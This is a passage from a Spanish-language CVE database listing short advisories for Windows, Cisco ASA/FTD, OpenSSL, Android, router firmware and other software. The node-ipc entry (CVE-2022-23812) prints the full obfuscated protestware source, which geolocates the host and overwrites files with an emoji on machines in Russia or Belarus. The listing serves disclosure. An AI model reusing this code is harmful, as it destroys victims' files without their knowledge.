    Una vulnerabilidad de Divulgación de Información en Windows Fast FAT File System Driver. Este ID de CVE es diferente de CVE-2021-41343
  • CVE-2021-36970
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad en Windows Print Spooler
  • CVE-2021-36953
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Denegación de Servicio de Windows TCP/IP
  • Vulnerabilidad en Storage Spaces Controller de Microsoft (CVE-2021-26441)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Elevación de Privilegios de Storage Spaces Controller. Este ID de CVE es diferente de CVE-2021-40478, CVE-2021-40488, CVE-2021-40489, CVE-2021-41345
  • CVE-2021-3450
    Severidad: MEDIA
    Fecha de publicación: 25/03/2021
    Fecha de última actualización: 04/08/2023
    El flag X509_V_FLAG_X509_STRICT permite llevar a cabo comprobaciones de seguridad adicionales de los certificados presentes en una cadena de certificados. No está establecido por defecto. A partir de la versión 1.1.1h de OpenSSL, se añadió como comprobación estricta adicional la de no permitir certificados en la cadena que tengan parámetros de curva elíptica codificados explícitamente. Un error en la implementación de esta comprobación significaba que el resultado de una comprobación previa para confirmar que los certificados de la cadena son certificados de CA válidos fueron sobrescritos. De este modo, se omite la comprobación de que los certificados que no son de CA no deben poder emitir otros certificados. Si se ha configurado un "purpose", se presenta la posibilidad de comprobar posteriormente que el certificado es una CA válida. Todos los valores de "purpose" implementados en libcrypto llevan a cabo esta comprobación. Por lo tanto, cuando se establece un propósito, la cadena de certificados seguirá siendo rechazada inclusive cuando se haya usado el flag strict. Se establece un propósito por defecto en las rutinas de verificación de certificados de cliente servidor de libssl, pero puede ser anulado o eliminado por una aplicación. Para que se vea afectada, una aplicación debe establecer explícitamente el flag de verificación X509_V_FLAG_X509_STRICT y no establecer un propósito para la verificación de certificados o, en el caso de las aplicaciones de cliente o servidor TLS, anular el propósito por defecto. Este problema afecta a las versiones 1.1.1h y posteriores de OpenSSL. Los usuarios de estas versiones deben actualizar a OpenSSL versión 1.1.1k. OpenSSL versión 1.0.2 no está afectado por este problema. Corregido en OpenSSL versión 1.1.1k (Afectadas versiones 1.1.1h-1.1.1j)
  • CVE-2021-30807
    Severidad: ALTA
    Fecha de publicación: 19/10/2021
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de corrupción de memoria con un manejo de memoria mejorado. Este problema es corregido en macOS Big Sur versión 11.5.1, iOS versión 14.7.1 y iPadOS versión 14.7.1, watchOS versión 7.6.1. Una aplicación puede ser capaz de ejecutar código arbitrario con privilegios del kernel. Apple tiene conocimiento de un informe que indica que este problema puede haber sido explotado activamente
  • CVE-2021-38295
    Severidad: MEDIA
    Fecha de publicación: 14/10/2021
    Fecha de última actualización: 08/08/2023
    En Apache CouchDB, un usuario malicioso con permiso para crear documentos en una base de datos puede adjuntar un archivo adjunto HTML a un documento. Si un administrador de CouchDB abre ese adjunto en un navegador, por ejemplo, por medio de la interfaz de administración de CouchDB Fauxton, cualquier código JavaScript insertado en ese adjunto HTML se ejecutará dentro del contexto de seguridad de ese administrador. Una ruta similar está disponible con la funcionalidad _show y _list, ya obsoleta. Esta vulnerabilidad de escalada de privilegios permite a un atacante añadir o eliminar datos en cualquier base de datos o realizar cambios de configuración. Este problema afectaba a Apache CouchDB versiones anteriores a 3.1.2
  • CVE-2021-27561
    Severidad: ALTA
    Fecha de publicación: 15/10/2021
    Fecha de última actualización: 08/08/2023
    Yealink Device Management (DM) 3.6.0.20 permite la inyección de comandos como root por medio del URI /sm/api/v1/firewall/zone/services, sin autenticación.
  • CVE-2021-33502
    Severidad: MEDIA
    Fecha de publicación: 24/05/2021
    Fecha de última actualización: 08/08/2023
    El paquete normalize-url versiones anteriores a 4.5.1, versiones 5.x anteriores a 5.3.1 y versiones 6.x anteriores a 6.0.1 para Node.js, presenta un problema de ReDoS (denegación de servicio de expresión regular) porque presenta un rendimiento exponencial para los datos: URL
  • CVE-2021-42576
    Severidad: ALTA
    Fecha de publicación: 18/10/2021
    Fecha de última actualización: 08/08/2023
    bluemonday sanitizer versiones anteriores a 1.0.16 para Go, y versiones anteriores a 0.0.8 para Python (en pybluemonday), no aplica apropiadamente las políticas asociadas a los elementos SELECT, STYLE y OPTION
  • CVE-2021-42299
    Severidad: BAJA
    Fecha de publicación: 20/10/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Omisión de la Funcionalidad de Seguridad en Microsoft Surface Pro 3
  • Vulnerabilidad en la administración de la memoria del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) (CVE-2021-34792)
    Severidad: ALTA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la administración de la memoria del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Esta vulnerabilidad es debido a una administración inapropiada de los recursos cuando las tasas de conexión son altas. Un atacante podría explotar esta vulnerabilidad al abrir un número significativo de conexiones en un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar una recarga del dispositivo, resultando en una condición de DoS
  • Vulnerabilidad en el Normalizador TCP del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) (CVE-2021-34793)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el Normalizador TCP del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) que funciona en modo transparente podría permitir a un atacante remoto no autenticado envenenar las tablas de direcciones MAC, lo que provocaría una vulnerabilidad de denegación de servicio (DoS). Esta vulnerabilidad es debido al manejo incorrecto de determinados segmentos TCP cuando el dispositivo afectado está operando en modo transparente. Un atacante podría explotar esta vulnerabilidad mediante el envío de un segmento TCP diseñado mediante un dispositivo afectado. Una explotación con éxito podría permitir al atacante envenenar las tablas de direcciones MAC en los dispositivos adyacentes, resultando en una interrupción de la red
  • Vulnerabilidad en la funcionalidad access control functionality del Protocolo simple de Administración de Redes versión 3 (SNMPv3) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-34794)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la funcionalidad access control functionality del Protocolo simple de Administración de Redes versión 3 (SNMPv3) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado consultar datos SNMP. Esta vulnerabilidad es debido a un control de acceso no eficaz. Un atacante podría explotar esta vulnerabilidad mediante el envío de una consulta SNMPv3 a un dispositivo afectado desde un host que no está permitido por la lista de control de acceso SNMPv3. Una explotación con éxito podría permitir al atacante enviar una consulta SNMP a un dispositivo afectado y recuperar información del dispositivo. El atacante necesitaría credenciales válidas para llevar a cabo la consulta SNMP
  • Vulnerabilidad en el envío de una petición de red en la funcionalidad de procesamiento de reglas del firewall basado en la identidad (IDFW) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-34787)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la funcionalidad de procesamiento de reglas del firewall basado en la identidad (IDFW) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado omitir las protecciones de seguridad. Esta vulnerabilidad es debido al manejo inapropiado de las peticiones de red por parte de los dispositivos afectados configurados para usar la búsqueda de grupos de objetos. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de una petición de red especialmente diseñada a un dispositivo afectado. Una explotación con éxito podría permitir al atacante omitir las reglas de la lista de control de acceso (ACL) en el dispositivo, omitir las protecciones de seguridad y enviar tráfico de red a hosts no autorizados
  • Vulnerabilidad en los paquetes SSL/TLS en el administrador de mensajes SSL/TLS para el software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) (CVE-2021-40117)
    Severidad: ALTA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el administrador de mensajes SSL/TLS para el software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Esta vulnerabilidad se presenta porque los paquetes SSL/TLS entrantes no se procesan correctamente. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de un paquete SSL/TLS diseñado a un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar una recarga del dispositivo afectado, resultando en una condición de DoS
  • Vulnerabilidad en la implementación del Intercambio de Claves de Internet Versión 2 (IKEv2) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-40125)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación del Intercambio de Claves de Internet Versión 2 (IKEv2) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto autenticado desencadenar una condición de denegación de servicio (DoS) en un dispositivo afectado. Esta vulnerabilidad es debido a un control inapropiado de un recurso. Un atacante con la capacidad de falsificar un peer IKEv2 site-to-site VPN confiable y en posesión de credenciales IKEv2 válidas para ese peer podría explotar esta vulnerabilidad mediante el envío de mensajes IKEv2 malformados y autenticados a un dispositivo afectado. Una explotación con éxito podría permitir al atacante desencadenar una recarga del dispositivo
  • Vulnerabilidad en la Puerta de Enlace de Nivel de Aplicación (ALG) para la funcionalidad Network Address Translation (NAT) del software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) (CVE-2021-34791)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Varias vulnerabilidades en la Puerta de Enlace de Nivel de Aplicación (ALG) para la funcionalidad Network Address Translation (NAT) del software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) podrían permitir a un atacante remoto no autenticado omitir la ALG y abrir conexiones no autorizadas con un host situado detrás de la ALG. Para conseguir más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso. Nota: Estas vulnerabilidades se han discutido públicamente como NAT Slipstreaming
  • Vulnerabilidad en la Puerta de Enlace de Nivel de Aplicación (ALG) para la funcionalidad Network Address Translation (NAT) del software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) (CVE-2021-34790)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Varias vulnerabilidades en la Puerta de Enlace de Nivel de Aplicación (ALG) para la funcionalidad Network Address Translation (NAT) del software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) podrían permitir a un atacante remoto no autenticado omitir el ALG y abrir conexiones no autorizadas con un host situado detrás del ALG. Para conseguir más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso. Nota: Estas vulnerabilidades han sido discutidas públicamente como NAT Slipstreaming
  • Vulnerabilidad en el administrador de mensajes SSL/TLS basado en software del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) (CVE-2021-34783)
    Severidad: ALTA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el administrador de mensajes SSL/TLS basado en software del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado causar la recarga de un dispositivo afectado, resultando en una condición de denegación de servicio (DoS). Esta vulnerabilidad es debido a la insuficiente comprobación de los mensajes SSL/TLS cuando el dispositivo lleva a cabo el descifrado SSL/TLS basado en software. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de un mensaje SSL/TLS diseñado a un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar la recarga del dispositivo afectado, resultando en una condición de DoS. Nota: Los mensajes TLS de datagrama (DTLS) no pueden ser usados para explotar esta vulnerabilidad
  • CVE-2019-1706
    Severidad: ALTA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el módulo de programa de cryptography module of the Cisco Adaptive Security Virtual Appliance (ASAv) y Firepower versión 2100 Series que ejecuta Cisco Adaptive Security Appliance (ASA) el programa podría permitir que un atacante remoto no autenticado provoque una recarga inesperada del dispositivo que provoque una condición de denegación de servicio (DoS). La vulnerabilidad se debe a un error lógico en la forma en que el módulo de criptografía del programa maneja las sesiones IPsec. Un atacante podría explotar esta vulnerabilidad creando y enviando tráfico en un gran número de sesiones IPsec a través del dispositivo objetivo. Un exploit con éxito podría causar que el dispositivo se recargue y resulte en una condición de denegación de servicio (DoS).
  • CVE-2019-1708
    Severidad: ALTA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la característica del Internet Key Exchange Version 2 Mobility and Multihoming Protocol (MOBIKE) (Cisco Mobility) para el programa ASA (Cisco Adaptive Security Appliance) y el programa Cisco Firepower Threat Defense (FTD) podría permitir que un atacante remoto no autenticado provoque una pérdida de memoria o recarga de un dispositivo afectado que lleva a una condición de denegación de servicio (DoS). La vulnerabilidad se debe al procesamiento inapropiado de ciertos paquetes MOBIKE. Un atacante podría explotar esta vulnerabilidad enviando paquetes MOBIKE creados a un dispositivo afectado para procesarlos. Una explotación con éxito podría hacer que un dispositivo afectado consumiera memoria continuamente y finalmente se recargara, resultando en una condición DoS. La función MOBIKE solo es compatible con direcciones IPv4.
  • CVE-2021-22406
    Severidad: MEDIA
    Fecha de publicación: 28/10/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de Excepción No Capturada en Huawei Smartphone. Una explotación con éxito de esta vulnerabilidad causará una salida no esperada de la aplicación
  • CVE-2021-38647
    Severidad: ALTA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota de Open Management Infrastructure
  • CVE-2021-43270
    Severidad: MEDIA
    Fecha de publicación: 02/11/2021
    Fecha de última actualización: 08/08/2023
    Datalust Seq.App.HtmlEmail (también se conoce como Seq.App.EmailPlus) versiones 3.1.0-dev-00148, 3.1.0-dev-00170, y 3.1.0-dev-00176, puede usar SMTP en texto sin cifrar en el puerto 25 en algunos casos en los que se pretendía el cifrado en el puerto 465
  • CVE-2021-40985
    Severidad: MEDIA
    Fecha de publicación: 03/11/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de desbordamiento del búfer under-read en htmldoc versiones anteriores a 1.9.12, permite a atacantes causar una denegación de servicio por medio de una imagen BMP diseñada a la función image_load_bmp.
  • CVE-2021-43414
    Severidad: MEDIA
    Fecha de publicación: 07/11/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GNU Hurd versiones anteriores a 0.9 20210404-9. El uso de un protocolo de autenticación en el servidor proc es vulnerable a unos ataques de tipo man-in-the-middle, que pueden ser explotados para la escalada de privilegios local para conseguir acceso completo a la root
  • CVE-2021-43404
    Severidad: MEDIA
    Fecha de publicación: 05/11/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en FusionPBX versiones anteriores a 4.5.30. El nombre del archivo FAX puede tener caracteres de riesgo
  • CVE-2021-43405
    Severidad: MEDIA
    Fecha de publicación: 05/11/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en FusionPBX versiones anteriores a 4.5.30. El fax_extension puede tener caracteres de riesgo (no está restringido a ser numérico)
  • CVE-2021-35368
    Severidad: ALTA
    Fecha de publicación: 05/11/2021
    Fecha de última actualización: 08/08/2023
    OWASP ModSecurity Core Rule Set versiones 3.1.x anteriores a 3.1.2, 3.2.x anteriores a 3.2.1 y 3.3.x anteriores a 3.3.2, está afectado por un desvío del cuerpo de la petición por medio de un nombre de ruta final
  • CVE-2022-22947
    Severidad: MEDIA
    Fecha de publicación: 03/03/2022
    Fecha de última actualización: 24/07/2023
    En spring cloud gateway versiones anteriores a 3.1.1+ y a 3.0.7+ , las aplicaciones son vulnerables a un ataque de inyección de código cuando el endpoint del Actuador de la Puerta de Enlace está habilitado, expuesto y sin seguridad. Un atacante remoto podría realizar una petición maliciosamente diseñada que podría permitir una ejecución remota arbitraria en el host remoto
  • CVE-2021-4083
    Severidad: MEDIA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 04/08/2023
    Se ha encontrado un fallo de lectura de memoria previamente liberada en la recolección de basura del kernel de Linux para los manejadores de archivos de socket de dominio Unix en la forma en que los usuarios llaman a close() y fget() simultáneamente y puede potencialmente desencadenar una condición de carrera. Este fallo permite a un usuario local bloquear el sistema o escalar sus privilegios en el sistema. Este fallo afecta a las versiones del kernel de Linux anteriores a la 5.16-rc4
  • CVE-2022-20049
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    En vpu, se presenta una posible escalada de privilegios debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS05954679; ID de Incidencia: ALPS05954679
  • CVE-2022-20053
    Severidad: ALTA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    En ims service, se presenta una posible escalada de privilegios debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada de privilegios local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS06219097; ID de Incidencia: ALPS06219097
  • CVE-2021-44734
    Severidad: ALTA
    Fecha de publicación: 20/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el saneo de entradas del servidor web integrado en los dispositivos Lexmark versiones hasta 07-12-2021, que puede conllevar a una ejecución de código remota en el dispositivo
  • CVE-2022-20054
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    En ims service, se presenta una posible inyección de comandos AT debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS06219083; ID de Incidencia: ALPS06219083
  • CVE-2022-26526
    Severidad: MEDIA
    Fecha de publicación: 17/03/2022
    Fecha de última actualización: 08/08/2023
    Anaconda Anaconda3 (Anaconda Distribution) hasta 2021.11.0.0 y Miniconda3 hasta 4.11.0.0 pueden crear un directorio escribible en el mundo bajo %PROGRAMDATA% y colocar ese directorio en la variable de entorno PATH del sistema. Así, por ejemplo, los usuarios locales pueden obtener privilegios colocando un archivo troyano en ese directorio. (Este problema sólo puede ocurrir en una instalación no predeterminada. La persona que instala el producto debe especificar que se está instalando para todos los usuarios. Además, la persona que instala el producto debe especificar que el PATH del sistema debe ser cambiado
  • CVE-2022-25219
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un error de interacción de bytes nulos en el código que el demonio telnetd_startup usa para construir un par de contraseñas efímeras que permiten a un usuario generar un servicio de telnet en el router, y para asegurar que el servicio de telnet persiste tras el reinicio. Por medio de un intercambio diseñado de paquetes UDP, un atacante no autenticado en la red local puede aprovechar este error de interacción de bytes nulos de tal manera que haga que esas contraseñas efímeras sean predecibles (con una probabilidad de 1 en 94). Dado que el atacante debe manipular los datos procesados por la función RSA_public_decrypt() de OpenSSL, una explotación con éxito de esta vulnerabilidad depende del uso de un cifrado RSA sin relleno (CVE-2022-25218)
  • CVE-2022-25218
    Severidad: ALTA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    El uso del algoritmo RSA sin OAEP, o cualquier otro esquema de relleno, en telnetd_startup, permite a un atacante no autenticado en la red de área local lograr un grado significativo de control sobre "texto plano" al que un blob arbitrario de texto cifrado será descifrado por la función RSA_public_decrypt() de OpenSSL. Esta debilidad permite al atacante manipular las diversas iteraciones de la máquina de estado de inicio de telnetd y eventualmente obtener un shell de root en el dispositivo, mediante un intercambio de paquetes UDP diseñados. En todas las versiones excepto K2 22.5.9.163 y K3C 32.1.15.93 un ataque con éxito también requiere la explotación de un error de interacción de byte nulo (CVE-2022-25219)
  • CVE-2022-25215
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en la interfaz LocalMACConfig.asp permite a un atacante remoto no autenticado añadir (o eliminar) direcciones MAC de clientes a (o desde) una lista de hosts prohibidos. Los clientes con esas direcciones MAC no pueden acceder a la WAN o al propio router
  • CVE-2022-25214
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en la interfaz LocalClientList.asp permite a un atacante remoto no autenticado obtener información confidencial sobre los dispositivos de la red de área local, incluyendo las direcciones IP y MAC. El control de acceso inapropiado en la interfaz wirelesssetup.asp permite a un atacante remoto no autenticado obtener las frases de acceso WPA para las redes inalámbricas de 2,4 y 5,0 GHz. Esto es particularmente peligroso dado que el asistente de configuración de K2G presenta al usuario la opción de usar la misma contraseña para la red de 2,4Ghz y la interfaz administrativa, haciendo clic en una casilla de verificación. Cuando la Administración Remota está habilitada, estos endpoints están expuestos a la WAN
  • CVE-2022-25213
    Severidad: ALTA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso físico inapropiado y el uso de credenciales embebidas en /etc/passwd permite a un atacante con acceso físico obtener un shell de root por medio de un puerto UART desprotegido en el dispositivo. El mismo puerto expone un shell Das U-Boot BIOS no autenticado
  • CVE-2022-26501
    Severidad: ALTA
    Fecha de publicación: 17/03/2022
    Fecha de última actualización: 08/08/2023
    Veeam Backup & Replication versiones 10.x y 11.x, presenta un Control de Acceso Incorrecto (problema 1 de 2)
  • CVE-2022-23812
    Severidad: ALTA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    Esto afecta al paquete node-ipc a partir de la versión 10.1.1 y versiones anteriores a 10.1.3. Este paquete contiene un código malicioso, que es dirigido a usuarios con IP ubicadas en Rusia o Bielorrusia, y sobrescribe sus archivos con un emoji de corazón. **Nota**: a partir de las versiones 11.0.0, en lugar de tener código malicioso directamente en el código fuente de este paquete, node-ipc importa el paquete peacenotwar que incluye un comportamiento potencialmente no deseado. Código Malicioso: **Nota:** ¡No lo ejecutes! js importado desde "path"; importado desde "fs"; importado desde "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer. from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t. on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer. from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer. from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // comprueba si el país es Rusia o Bielorrusia if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a. readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u. join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // sobrescribe el archivo con ? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
  • CVE-2021-39715
    Severidad: BAJA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función __show_regs del archivo process.c, se presenta una posible pérdida de memoria y direcciones del kernel debido a una divulgación de información de registro. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución System necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-178379135, Referencias: kernel Ascendente
  • CVE-2021-39712
    Severidad: MEDIA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En TBD de TBD, se presenta una posible vulnerabilidad de uso de memoria previamente liberada debido a una condición de carrera. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-176918884, Referencias: N/A
  • CVE-2021-39708
    Severidad: ALTA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función gatt_process_notification del archivo gatt_cl.cc, se presenta una posible escritura fuera de límites debido a una comprobación de límites incorrecta. Esto podría conllevar a una escalada de privilegios remota sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12, ID de Android: A-206128341
  • CVE-2021-39693
    Severidad: ALTA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función onUidStateChanged del archivo AppOpsService.java, se presenta una posible forma de acceder a la ubicación sin un indicador visible debido a un error lógico en el código. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12, ID de Android: A-208662370
  • CVE-2021-39690
    Severidad: MEDIA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función setDisplayPadding del archivo WallpaperManagerService.java, se presenta una posible forma de causar un DoS persistente debido a una comprobación de entrada inapropiada. Esto podría conllevar a una denegación de servicio local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12, ID de Android: A-204316511
  • CVE-2021-0957
    Severidad: ALTA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función NotificationStackScrollLayout del archivo NotificationStackScrollLayout.java, se presenta una posible forma de omitir las protecciones de restablecimiento de fábrica. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12, ID de Android: A-193149550
  • CVE-2021-43955
    Severidad: MEDIA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    El recurso /rest-service-fecru/server-v1 en Fisheye y Crucible versiones anteriores a 4.8.9, permitía a atacantes remotos autenticados obtener información sobre los directorios de instalación por medio de una vulnerabilidad de divulgación de información
  • CVE-2021-2351
    Severidad: MEDIA
    Fecha de publicación: 21/07/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el componente Advanced Networking Option de Oracle Database Server. Las versiones compatibles que están afectadas son 12.1.0.2, 12.2.0.1 y 19c. Una vulnerabilidad difícil de explotar permite a un atacante no autenticado con acceso a la red por medio de Oracle Net comprometer a advanced Networking Option. Los ataques con éxito requieren una interacción humana de una persona diferente del atacante y, mientras la vulnerabilidad se encuentra en Advanced Networking Option, los ataques pueden afectar significativamente a productos adicionales. Los ataques con éxito de esta vulnerabilidad pueden resultar en la toma de control de Advanced Networking Option. Nota: La actualización de parches críticos de julio de 2021 introduce una serie de cambios en el Cifrado de Red Nativo para hacer frente a la vulnerabilidad (CVE-2021-2351 y prevenir el uso de cifrados más débiles. Los clientes deben revisar: "Changes in Native Network Encryption with the July 2021 Critical Patch Update" (Doc ID 2791571.1). CVSS 3.1 Puntuación Base 8.3 (Impactos en la Confidencialidad, Integridad y Disponibilidad). Vector CVSS: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)
  • CVE-2022-21895
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows User Profile Service. Este ID de CVE es diferente de CVE-2022-21919
  • CVE-2022-21896
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows DWM Core Library. Este ID de CVE es diferente de CVE-2022-21852, CVE-2022-21902
  • CVE-2021-36411
    Severidad: MEDIA
    Fecha de publicación: 10/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha encontrado un problema en libde265 versión v1.0.8, debido a un control de acceso incorrecto. Se ha producido un SEGV causado por un acceso de memoria READ en la función derive_boundaryStrength del archivo deblock.cc. La vulnerabilidad causa un fallo de segmentación y el bloqueo de la aplicación, que conlleva a una denegación de servicio remota
  • CVE-2022-21882
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Win32k. Este ID de CVE es diferente de CVE-2022-21887
  • Vulnerabilidad en el envío de una petición HTTPS en la interfaz de servicios web del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-1573)
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 16/08/2023
